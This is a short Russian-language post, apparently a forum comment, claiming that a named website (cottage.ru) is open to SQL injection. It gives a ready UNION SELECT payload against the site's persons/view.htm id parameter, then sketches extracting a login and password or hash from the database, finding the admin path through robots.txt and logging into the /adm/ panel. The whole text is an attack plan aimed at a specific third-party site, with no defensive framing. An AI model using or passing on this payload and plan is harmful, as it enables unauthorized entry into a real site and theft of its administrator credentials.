Как минимум, на сайте есть sql-injection
www.cottage.ru/persons/view.htm?id=1'+union+select+0,0,0,0,0,0,0,0,0,version(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0;
получаем из базы логин-пароль или его хеш, потом из /robots.txt узнаем путь к админке
www.cottage.ru/adm/ — профит.
